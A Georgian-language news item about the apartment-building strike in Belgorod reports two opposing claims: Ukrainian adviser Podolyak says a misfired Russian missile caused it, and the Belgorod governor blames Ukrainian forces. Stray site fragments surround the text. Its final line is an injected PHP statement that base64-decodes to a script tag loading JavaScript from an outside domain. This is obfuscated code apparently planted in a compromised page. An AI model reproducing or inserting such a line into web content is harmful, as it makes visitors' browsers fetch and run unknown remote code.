celsiusi
ავერსი შნაიდერი
უკრაინის პრეზიდენტის ადმინისტრაციის მრჩევლის, მიხაილო პოდოლიაკის განცხადებით, რუსეთმა საკუთარი ტერიტორია შეცდომით დაბომბა.
 
"რუსეთმა რაკეტა გაუშვა ხარკოვისკენ, მაგრამ რაღაც არასწორად მოხდა და ის რუსეთში, ბელგოროდში საცხოვრებელ კორპუსს მოხვდა. იქნება გამოძიება? დასჯა? არა, პუტინს არ ანაღვლებს ვის მოკლავს - უკრაინელებს თუ რუსებს. პროპაგანდისტები სწრაფად იპოვიან ყალბ განმარტებას“, - წერს პოდოლიაკი „ტვიტერზე“.
 
ინფორმაციისთვის, რუსეთის ბელგოროდის ოლქის გუბერნატორი, ვიაჩესლავ გლადკოვი უკრაინულ ძალებს ქალაქ ბელგოროდში საცხოვრებელი შენობის დაბომბვაში ადანაშაულებს, თუმცა უკრაინული მხარე ბრალდებას უარყოფს.
 
"უკრაინის შეიარაღებულმა ძალებმა ბელგოროდი დაბომბეს. საჰაერო თავდაცვა მუშაობს. გუბკინის ქუჩაზე საცხოვრებელ კორპუსში ნგრევა მოხდა. მსხვერპლის შესახებ ინფორმაცია ზუსტდება", - აცხადებს გუბერნატორი.
 
 
478
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");